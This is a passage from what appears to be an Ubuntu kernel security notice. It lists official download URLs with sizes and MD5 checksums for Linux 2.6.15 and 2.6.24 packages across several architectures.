    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    85854 59c8914383ae0624690950d8f844c101
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    60378 183583ac6a0ab738109499861a861ca2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    70420 da9263ada0b850362f022c36b6769f22
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   115790 ac0661102201e3f682eda1052d987671
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   168082 6f375034031b861fe42ba973c9390ded
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
      Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:    40380 c083f0781fb33b64329d10c233affde2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:   149304 958f0b630326763cddddce5503f3319d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
      Size/MD5:   773010 979da22c264d122841ea140319b365ce
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
      Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb
      Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
      Size/MD5: 15017856 479231852577fdd0e402556287a02059
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
      Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:   163276 481deef18ee50e039791747737619c3e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:    59308 83efde441d0de3f09bb163e53016a300
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
      Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz
      Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc
      Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb
      Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb
      Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb
      Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb
      Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    52646 2c736bab70f1efeade320f9062b74729
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   145458 3e087634d61556643c32e342214a0642
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb
      Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
      Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb
      Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb
      Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb
      Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb
      Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb
      Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb
      Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb
      Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb
      Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    21598 6d6c27b8756a70466451449e096bd149
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
      Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
      Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb
      Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb
      Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    23690 ceb5d148f00965516252470b41d00b56
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    26794 50bb7020338de7d00265de0765578291
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    32672 7135f346092b651dafed111b91aee44d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
      Size/MD5:    47602 e55422dc48484675642c96bdbc673595
    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
      Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a
